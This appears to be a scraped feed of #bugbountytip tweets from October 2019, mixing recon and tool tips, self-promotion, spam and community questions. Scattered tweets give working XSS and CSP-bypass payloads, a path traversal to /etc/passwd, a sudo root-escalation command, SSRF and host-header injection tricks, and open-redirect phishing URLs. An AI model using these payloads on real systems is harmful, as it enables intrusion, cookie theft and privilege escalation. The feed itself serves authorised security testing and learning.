2019-10-16 08:52:27
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
m0z
@LooseSecurity


2019-10-15 23:25:51
0 I get asked lots of #BugBounty questions, and one I'm always asked is "Is X valid bug" or "I reported X and it was out of scope". The answer is to read the program's scope before reporting. I know it's not always obvious, but the answer is there... #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-15 17:26:34
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-15 16:04:43
1 The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss https://t.co/BBtdSvmYt6
ironfist
@ironfisto


2019-10-15 15:59:35
0 Not great tip but you might land Cassandra cluster in connection tab of datastax studio. Shodan search-> html:datastax #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-15 12:56:16
7 #bugbountytip #bugbounty This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. https://t.co/ODpUpWRypc
Infected Drake
@0xInfection


2019-10-15 11:33:41
1 I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to @har1sec for the assignment. :) #infosec #bugbountytip https://t.co/BnB2fqVdTd
Random Robbie
@Random_Robbie


2019-10-15 06:35:58
2 inside a container.... limited privs? SUDO!!!! https://t.co/ocd7FodNqp sudo -u#4294967295 id uid=0(root) gid=1002(robbie) groups=1002(robbie) sudo -u#4294967295 whoami root #bugbountytip #escapethcontainer
hyperdummy
@dummyclout


2019-10-15 05:15:54
0 ping for vis. any thoughts? #bugbounty #bugbountytip
Pat.
@PuzzledPat


2019-10-15 03:22:57
0 @MacRumors, check out the year 2038 in your iPhone calendar.. notice that #Apple have given July and April some extra months. #bugbountytip https://t.co/Wrk7TEexIS
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-15 03:13:31
0 Morning Like this! #bugbounty #bugbountytip https://t.co/DsshG2nqAw
ً
@GouveaHeitor


2019-10-14 12:51:12
1 If you found a possible IDOR like: http://host/api/AccountID=123 But it is being blocked when you pass an ID from another account, try bypass it making a parameter pollution like: http://host/api/AccountId=123&AccountId=456 #bugbountytip
Ankush Goel
@0xankush


2019-10-14 06:53:27
0 If you are not automating and scripting, you are missing on a lot of fun. It's all about time management in #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-13 18:53:47
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #cybersecurity #ceh #eccouncil #certification https://t.co/0gfcgW7uTM https://t.co/mzllE9lUqq
Ammar Amer🇸🇾
@cry__pto


2019-10-13 16:37:03
7 I have uploaded 74 new articles as PDF files about different fields of hacking + Linux, cybersecurity, etc. to my GitHub repository. Enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/XE81lBik5M
Garth Humphreys
@garthhumphreys


2019-10-13 16:16:36
0 #Random thought: Is it #dups or #dupes ? #BugBounty #bugbountytip #infosec
Security Executions Code
@pwn0sec


2019-10-13 15:38:36
0 Bug Bounty ATT : Server-Side Request Forgery (SSRF) https://t.co/hjQLeWxwIS #bugbounty #bugbountytip #bugbountytips #ssrf #hackerone #att
ahamed morad
@Modam3r5


2019-10-13 15:06:47
2 this is one of my reports that I think let me win by the invitation. #bugbountytip https://t.co/fCcnzDat6I
Harsh kumar
@Harshku21974218


2019-10-13 12:37:58
1 Bypassing the WebARX Web Application Firewall (WAF) https://t.co/n09E8OhI2K #cybersecurity #bugbountytip
Evan Custodio
@defparam


2019-10-13 03:02:20
0 By using the boundary "SmuggleThis"+colon I could end the dangling part anywhere in the headers (could be handy). When I went to go check and see if "test.txt" was written to the server I was happy to see I had smuggled my own request and found the CDN headers. #bugbountytip https://t.co/BxYMvBYlsB
ghostlulz
@ghostlulz1337


2019-10-13 02:11:51
0 You know you can turn that SSRF finding into something with devastating impact right? The AWS metadata REST API can be used to steal credentials via SSRF. More information on my blog: https://t.co/2DgWQ2LJkp #infosec #bugbountytips #osint #redteam #aws #bugbountytip #ssrf #hack https://t.co/CCpKLNnF1m
Ashraf
@m0rph1n3e


2019-10-13 01:04:21
0 SPENDING HOURS TESTING MY TARGET FOR CLIENT SIDE VULNERABILITIES, I AM STUCK AT THIS POINT. ANY ADVICE? METHODOLOGY? #bugbounty #bugbountytip #bugbountytips #infosec #xss #ssti #rce #hackerone
Andri Wahyudi 📂
@andripwn


2019-10-12 22:03:00
1 admin live now #bugbounty #bugbountytip https://t.co/VEXedERrSN
Ammar Amer🇸🇾
@cry__pto


2019-10-12 19:33:37
1 Automatic screenshot tools, used to take screenshots of a large list of targets to extract useful info like errors that may lead to vulnerabilities -1-EyeWitness: https://t.co/7kbFXmViog -2-HTTPScreenShot: https://t.co/93SafaL5kg -3-Gowitness: https://t.co/YW8bdd75MW #bugbountytip
Rohit Kumar (@rohitcoder)
@rohitcoder


2019-10-12 09:30:44
0 https://t.co/KGbg9IYk2W Bounty: $$$ Thanks to Facebook and other programs, they're helping me to carry out my startup with these funds. This BugBounty life really helped me a lot. #BugBountyTip #BugBounty #Facebook #FacebookBugBounty #Hacker0x01 #EthicalHacking #Hacking
FS
@fsec__


2019-10-12 01:56:49
0 Terminal tips #bugbountytips #bugbountytip #bugbounty https://t.co/dMR3wWBW9c
hacks2learn
@hacks2learn


2019-10-12 00:48:14
0 #ProTip when dropping XSS payloads into a complex dynamic application use breadcrumbs to retrace your steps. I spent 60+ mins trying to find where my hidden pop-up came from... instead use tests like alert("Home->Settings->Profile->Background->Image->NAME_field") #bugbountytip
Garth Humphreys
@garthhumphreys


2019-10-11 20:59:04
0 Gained admin access! #BugBounty #bugbountytip #bugbounties #infosec #appsec #writeup https://t.co/tOKQkuzHax
kaustubh padwad
@s3curityb3ast


2019-10-11 20:46:37
0 One of the best parts of @SynackRedTeam is their missions. I rarely got a chance to grab one. But they are quick, they pay, and knowledge is a bonus from it #bugbounty #bugbountytip #synack https://t.co/kBptrSMaam
Mourad
@SecuAudit


2019-10-11 16:04:53
0 Livechat is the most vulnerable part of a website , you have 85% of chance to find an XSS or IDOR there , if your favorite Bug Bounty program have a livechat support start pentesting it. #bugbountytip #bugbountytips #BugBounty https://t.co/LSwH3IZwY4
Somdev Sangwan
@s0md3v


2019-10-11 12:44:42
1 I performed a little experiment on bug hunters and as it turns out, lot of them are....curious hackers. Tweet 1's statistics are for 12 minutes and Tweet 2's statistics are for 5 minutes. Dear marketers, if you add #bugbountytip, these people will even read food recipes. https://t.co/s6vSo7Yra2
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:09:48
0 Maximise Your Bug Bounty Tutorial 🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/0gfcgW7uTM
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:06:48
0 Maximise Your Bug Bounty —- 🤑🤑🤑 Bug Bounty Tools — 🤩🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OgAsV7XrzP
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-11 09:13:57
1 And sometimes for (LFI) url?para=//..//..//..//..//..//..//..//..//etc//passwd// Works!! #bugbountytip #BugBounty #bugbountytips #bugbounty
Sudoka
@sudo_sudoka


2019-10-11 04:35:44
0 Today I learned that @binaryedgeio can find many more things than Shodan. I searched for Pulse Secure VPN and found many servers that Shodan does not index. You should give it a try at https://t.co/AZ43zPOuOW #BugBounty #bugbountytip #infosec #ThreatIntel #recon https://t.co/R0yBjlP0Gz
Murdockz
@Murdockz_CEH


2019-10-11 03:20:28
0 5 hours = 2 Critical 1. Admin ATO 2. GraphQL API privilege escalation Take a step back and learn from your mistakes then come back harder. Writeups soon. #bugbounty #infosec #bugbountytip
Ashraf
@m0rph1n3e


2019-10-10 15:10:32
0 I'VE FOUND API, TOKENS, AND SECRET KEYS. HOW TO VALIDATE BEFORE WRITING A REPORT? I WISH SOMEONE ANSWER ME ASAP. #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity #WAF #SSTi #RCE #XSS #DataLeakage
Vincent RATISKOL
@vratiskol


2019-10-10 14:26:18
0 To illustrate my previous post, Burp Session handling tracer showing session validation with macro before sending request @Burp_Suite #bugbountytip https://t.co/F90REmVw0J
Michele Romano
@Mik317_


2019-10-10 14:19:50
2 What endpoints do you control when you come across a WP/Ghost instance? I've found a really good one: /blog/_wpeprivate/config.json, what about you? #BugBounty #bugbountytip
Security Executions Code
@pwn0sec


2019-10-10 12:58:41
1 Android App Penetration Testing #1 https://t.co/mlqVodvKJp #bugbounty #android #app #vulnerability #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 12:45:07
0 Maximise Your Bug Bounty With this Google Dork -- / -- inurl:fisheye AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:https://t.co/lc63NzPGi5 inurl:crucible AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:http://github #BugBounty #BugBountyTip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-10 11:54:38
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:07:07
1 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/Yytl4wdZn9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:06:46
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/RQMWrnQNek
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:06:27
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/OY9jiDUdDR
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-10 07:30:32
1 Simple Script for scanning ports of all grabbed subdomains using masscan for scan in $(cat <file-path>); do masscan -p1-65535 $(dig +short $scan|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee port_scan #BugBountyTips #bugbountytip #bugbounty
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-10 06:48:04
0 #BugBountyTip To discover domains deployed on Github for subdomain takeover. Go to https://t.co/oLL4MCjX1S and search for "There isn't a Github Pages site here" Googledork: intitle:"Site not found · GitHub Pages" intext:"There isn't a Github Pages site here"
Iamsaintmalik_
@saintmalik_


2019-10-09 20:30:16
0 Guys am getting this response while trying to load some xss scripts, any help on how I can bypass this @bugbountyforum @stokfredrik @s0md3v #bugbountytips #BugBounty #bugbountytip https://t.co/n3jWvvTt7e
m0z
@LooseSecurity


2019-10-09 19:02:07
3 A quick reminder that my bug bounty challenge site is still live with 2 challenges! The second of which is very advanced (incorporating a WAF). https://t.co/cNYQsVPQ3K #bugbountytips #bugbountytip #bugbounties #bugbountyprogreartip
Rémy Marot
@R_Marot


2019-10-09 19:01:00
0 Simple but useful tool if you only have an index file inside a .git directory (no luck :)) and want to have it human readable : https://t.co/QRHd7CbsYC #bugbountytip
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 18:58:38
0 One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #bugbountytips #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:35:17
0 Free Antivirus Be Like —// Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/XRSvgxtOyT
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:34:35
2 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Mourad
@SecuAudit


2019-10-09 15:36:58
0 if you find a Form where you need ( Email + Date of birth + Zip code) to login , try to remove Zip code and Date of birth and send the form . #bugbountytip #bugbountytips #BugBounty https://t.co/uVw71NPXLo
tololovejoi
@tolo7010


2019-10-09 13:43:58
0 Question: Can i know how old are you sir? Please answer me Answer: (Please see my replies below): #bugbounty #bugbountytips #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-10-09 13:29:09
0 account takeover write up all what u need is the email of the victim #bugbountytips #bugbountytip #cybersecurite https://t.co/W1DzdvWjST
Sanketh Sharath
@sharathsanketh


2019-10-09 12:57:14
0 Thanks very much @PentesterLand for featuring my blog post/article in your newsletter this week! Was pleasantly surprised. Appreciate it :) This is a lot of motivation for a beginner like me. Cheers! #bugbounty #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-09 12:47:35
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Mourad
@SecuAudit


2019-10-09 11:11:35
0 Pentesting is becoming Harder and Harder , When I started in 2013 things were different , Now you need to grow your Mindset more than your Skills to Survive and achieve a decent living standard from BugBounty . #bugbounty #bugbountytip #pentesting #hackerone https://t.co/envVq5Lu0Q
Ammar Amer🇸🇾
@cry__pto


2019-10-09 09:03:26
6 Sub-Domain Takeover Tools: -1-SubOver:https://t.co/uzQ2X1rQ2v -2-Subjack:https://t.co/FdytR89u1w -3-autoSubTakeover:https://t.co/TWHTicVKnI -4-tko-subs:https://t.co/Tawtj1NvWc -5-HostileSubBruteforcer:https://t.co/3ydVulWy8l -6-Aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-10-09 07:53:40
2 2 udemy courses about ethical hacking free for a limited time both are 50 hours of useful content + high quality videos.and you will get a certification when finished prove that you finished the course. https://t.co/3xMEpNFL7u https://t.co/oZvixlG4LL #bugbountytip #hacking
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 07:07:53
0 Just saw your video on automation for finding 3rd level domains @thecybermentor It was nice!, Can use subfinder instead with -recursive option will do the same right? subfinder -d <domain> -recursive -silent -t 200 -v -o <out-put-file> #bugbounty #bugbountytip
Hritik Sharma
@iamHritikSH


2019-10-09 05:56:22
0 Server parses the XML but the problem is parameter entities are not working and whenever I try to use normal entity the server responds that content is not valid for application/xml, any tips community? #bugbounty #bugbountytips #bugbountytip
Brodie Codie
@brodie_codie


2019-10-09 03:04:35
3 Mood After finding another Bug #hackers #netsec #bugbounty #hacking #redteam #OSINT #recon #offsec #CTF #pentest #bugbountytip #bugbountytips #BrodieCodie #Metasploit #infosec #infosecurity https://t.co/bqwQBo5GVj
m0z
@LooseSecurity


2019-10-08 20:49:41
3 When I started out on my #BugBounty journey a little over 2 years ago, I read all the vulnerabilities on this page (and attempted to make a vuln web app to test some of them): https://t.co/M8VmqRlt8I I hope it helps someone else start their journey. #bugbountytip #bugbountytips
baluz🔥
@haknfuk


2019-10-08 14:42:47
0 If u feel like quitting stop feeling it #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:48:22
0 #bugbountytip if you ever encounter an endpoint filtering ' try \' it may work sometimes :) #sqli
Khaled Mohamed
@xelkomy


2019-10-08 12:42:46
0 awesome machine #hackthebox @hackthebox_eu #bugbountytip https://t.co/RtbEq1u5Z9
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:15:05
0 Hackers Turn Own Features Against It 🔥💕 #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-08 10:23:58
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-07 16:46:27
0 Seriously don't waste your time on searching for crlf injections, today i scanned nearly 30000+ unique domains and guess how many crlf's i found 0. #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-07 07:17:36
1 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-07 06:06:27
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Sudoka
@sudo_sudoka


2019-10-07 04:50:48
0 Koha, the popular open source ILS, has Open Redirect at https://t.co/4FJZI7rSG7. Google Dork for inurl:/cgi-bin/koha/ Then send a request to victims like this: site[.]com/cgi-bin/koha/tracklinks.pl?uri=//phishing.site #bugbounty #bugbountytip #threatintel
Securisec 🚀
@securisec


2019-10-07 00:40:26
2 "RT RT LooseSecurity: Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/bVfEZ0Drd4 #bugbountytips #BugBounty #bugbountytip"
Abood Nour
@AboodNour


2019-10-06 23:35:12
1 Found a better way to search GitHub projects using their own search filters. https://t.co/JJ7sn2DjQj In my case: `filename:file.php libname in:path` increased returned unique results to > 1.2K instead of ~20 returned from similar Google dork #BugBountyTip #BugBounty
m0z
@LooseSecurity


2019-10-06 22:32:42
5 Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/NHrtVoOw04 #bugbountytips #BugBounty #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2019-10-06 22:17:04
3 Coming this week: the first video in the 'Finding Your First Bug' series, we're going to look at Business Logic Errors, first we'll look at what they are, how to find them, examples of some real bugs and do a practical with Burp! #BugBounty #bugbountytips #bugbountytip https://t.co/KxOUGVSxR3
RHack
@Queseguridad


2019-10-06 19:38:39
0 Some payloads bypass XSS '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> CloudFront 1%3C/script%3E%3Csvg/onload=prompt(document[`domain`])%3E Akamai <dETAILS/open/onToGgle=a=prompt,a(45) x> Inperva #Bugbounty #Bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-06 19:11:55
3 Findomain 0.5.0 is out! Now you can also send new subdomain alerts to @telegram! Check out the documentation for a detailed guide on how get it working! https://t.co/VKrEP3eY4d #subdomains #enumeration #monitoring #BugBounty #bugbountytip #reconnaissance #automation #webhooks
Joe Bradshaw
@SnakesNBradders


2019-10-06 17:01:47
0 Want to extend this to the bugbounty community as well for help. #bugbountytip https://t.co/eqYt3M5gFX
Ammar Amer🇸🇾
@cry__pto


2019-10-06 08:01:17
3 During web pentesting operations, when seeing a registration page you should try to register with an existing username, to see if you can enumerate users. This is what I saw on @PayPal. You can automate the whole process and get a list of website users. #bugbountytip #hacking https://t.co/WOZYUy4ulH
baluz🔥
@haknfuk


2019-10-06 06:15:57
1 #bugbounty #bugbountytip a channel for coders https://t.co/9JRrkSX6Pe
John mash
@Techhelplistcom


2019-10-06 05:00:01
0 I have uploaded 38 new articles as PDF files about different fields of hacking to my GitHub repository. Enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/fNomAuiIdC https://t.co/waACGyXyHC
Matt Palmer
@mattpalmer_au


2019-10-06 04:44:27
0 1. First Program: Indeed 2. Had difficulties: Google 3. Most used Platform: Bugcrowd and Google 4. Totally hate: 5. Most loved: Automation 6. For beginners: Read, read, read #bugbounty #bugbountytip #bugbountytips https://t.co/EevoSwrDA5
Ammar Amer🇸🇾
@cry__pto


2019-10-06 04:28:06
4 I have uploaded 38 new articles as PDF files about different fields of hacking to my GitHub repository. Enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/q2layzVpKz https://t.co/52Utrc6IMy
Imran nissar
@Imrannissar3


2019-10-05 22:25:11
0 Unexpected behaviour regarding web cache deception attack. Using Account 1 the page is being cached for 1 min and I am able to see all the information in incognito/different browser, but when I log in from a different account the page is not being cached #bugbountytip #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-05 19:29:36
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
jub0bs
@jub0bs


2019-10-05 17:15:48
0 #BugBountyTip "[Blind SSRF] cannot be trivially exploited to retrieve sensitive data from back-end systems"... except when forged requests to an attacker-controlled server contain sensitive data (e.g. an API key in headers). Happened to me a few days ago. https://t.co/LTrqNqZ8zK
Nick (@hunt4p1zza)
@ngkogkos


2019-10-05 13:41:01
2 Custom wordlist for file/folder/param fuzzing: 1. Flag interesting requests w/ "WLIST" in Burp constantly 2. Sort requests w/ "WLIST" > HTTP History 3. Use CO2 plugin, send requests to CeWLer & Extract Words 4. Normalize wordlist to ASCII w/ IDE/bash #bugbounty #bugbountytip https://t.co/lazF02od9j
bugbountytip
@a_l_e_r_t_1_


2019-10-05 12:39:03
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Jinone
@jinonehk


2019-10-05 09:57:12
0 <script src="https://t.co/1UvE8Y0fOd)"></script> bypass csp https://t.co/Jt9xQeag4g #BugBounty #BugBountyTip #WAF https://t.co/nz2OYbKBGx
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:14:53
0 Silent omission of certificate hostname verification in LibreSSL and BoringSSL Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/A2EJ8bgNyP
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:13:13
0 Malware Analysis 101 - Sandboxing Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/TXX3kDeuhe
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:09:35
0 Pushing Left, Like a Boss: Table of Contents Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Xs9P4t11CR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:08:16
0 Red Teamer’s Guide to Pulse Secure SSL VPN Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/7qf0K4KUKR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:04:53
2 Download predictions details of ads plans of any business. Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/nj3z2KLprL
Nick (@hunt4p1zza)
@ngkogkos


2019-10-04 19:20:20
0 This is the bash function I use for #bugbounty on a target. Although I use checklists, enforcing organization via the filesystem forces me to do a good/clean job & serves as a 2nd checklist. Also, helps w/ being more efficient, as you can tailor cheatsheets/scripts. #bugbountytip https://t.co/B7gq2pvaZW
bugbountytip
@a_l_e_r_t_1_


2019-10-04 15:50:17
0 Chrome ❎ Firefox ✅ #Bugbountytip https://t.co/nB1NqVdEPK
Ammar Amer🇸🇾
@cry__pto


2019-10-04 13:37:36
2 The Multi-Tool Web Vulnerability Scanner. sometimes you may need to automate some work+ it may give you some ideas wget -O https://t.co/AVYJOtJVY1 https://t.co/eBwaz4GrYH && chmod +x https://t.co/AVYJOtJVY1 python https://t.co/AVYJOtJVY1 https://t.co/KdHhpMDaA0 #bugbountytip https://t.co/wMBgzbyvVx
Michele Romano
@Mik317_


2019-10-04 13:32:34
1 Bypassed a CSTI protection: {{alert(1)}} renders a <span> tag with value 1 ... JS not evaluated, but you can turn it in {{alert('<script>alert(1)</script>')}} and your day becomes a better day 😊 #bugbountytip
Shiva Kumawat
@ShivaKumawat88


2019-10-04 12:59:48
0 It may be a bug at #amazon mobile app #AmazonRocketDeals #AmazonGreatIndianFestival #AmazonRiddler #JokerMovie #bugbountytip #techno Here is video link--- https://t.co/I16F6WSj85
Evan Custodio
@defparam


2019-10-04 12:18:43
0 If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(https://t.co/VXyqysIsep) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
Flawwan
@Flawwan


2019-10-04 10:29:30
0 New blog post: Abusing PHP strip tags to bypass modern WAF to exploit XSS. https://t.co/MXRTMOuoEV #BugBounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-04 09:41:07
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Khaled Mohamed
@xelkomy


2019-10-04 08:30:35
0 #xss #bugbountytip #xelkomy Reflected Xss in Ibm POC https://t.co/YOoDCKbYHe
Imran nissar
@Imrannissar3


2019-10-04 07:58:45
0 Password reset host header injection Host: https://t.co/cxR3o4EYIs Bypassed by Host:https://t.co/cxR3o4EYIs"><a href='https://t.co/wgqXnDuzXt> #bugbountytip #bugbounty @Hacker0x01 @Bugcrowd
Verneet
@err0rrrrr


2019-10-04 06:41:10
1 Bypass CSP with: <embed /: script allowscriptaccess = always src = javascript:alert(document.cookie); https://t.co/dIZsSFrPmX> Just bypassed a Taxi company CSP :p @LooseSecurity #bugbountytip #bugbounty #bugcrowd
Evan Custodio
@defparam


2019-10-04 00:06:57
0 @AldoTheCrott @NahamSec @Twitch HTML injection in a email callback where I could control the CC addr and parts of the body. #bugbountytip test adding HTML into email callbacks. If the email puts the email address in the body try adding HTML after a '+'-sign alias (e.g. foo+<B><BR>[email protected])
A hacker's life
@Unknownuser1806


2019-10-03 20:49:05
0 Open redirect payloads https://t.co/ObQYpkmvym #payload,#hacking, #bugbounty,#bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-03 20:08:23
0 Bug Bounty = Hardwork + Will Power + Dedication #bugbounty #bugbountytip #devsecops #devops #secops #cybersecurity #hacking https://t.co/o9uZTW5vDa
Fisher
@Regala_


2019-10-03 18:31:03
0 @rudra16t @zseano Are you learning? Are you improving? Are you a better hacker than what you were a year ago? You get imposter syndrome if you compare yourself to others. YOU are only one you should compare and compete with. #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-03 15:39:29
0 #bugbountytips #bugbountytip Need help. Get good xss from cookie based xss. Any suggestion? Share your knowledge.
Masonhck357
@DanielM59720745


2019-10-03 14:56:24
0 #bugbountytip NEVER STOP DOING RECON: I ended up finding sensitive info on a subdomain that I found doing recon the second time around last week. I just found out that the subdomain is only used when they sell tickets for an event. They said that my timing was just perfect :)
intigriti
@intigriti


2019-10-03 14:18:30
9 Can't get CSRF with POST? Then GET it! Use 'change request method' in Burp Suite to check if the server also accepts GET requests. Thanks for the #BugBountyTip, @spaceraccoonsec! #HackWithIntigriti https://t.co/YVRPwZD6L0
bugbountytip
@a_l_e_r_t_1_


2019-10-03 08:05:53
1 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
bing0o
@hack1lab


2019-10-03 02:46:08
1 My new tool now on github, Web Technologies Detector, simple but useful for developers, penetration testers and bug hunters 😎 https://t.co/z5FF4P3v9j #bugbountytool #BugBountyTip #bing0o https://t.co/ewDkgbl1L4
bugbountytip
@a_l_e_r_t_1_


2019-10-02 21:04:44
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-02 17:14:40
9 CloudFront ~`XSS´ payload, shake dice. 🎲 <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> #BugBounty #BugBountyTip #WAF #infosec
dedsec
@dedsec211


2019-10-02 16:05:42
0 used this website to get Latest bug bounty related tweets #bugbountytip https://t.co/rWZ5mUNUnp
baluz🔥
@haknfuk


2019-10-02 14:44:09
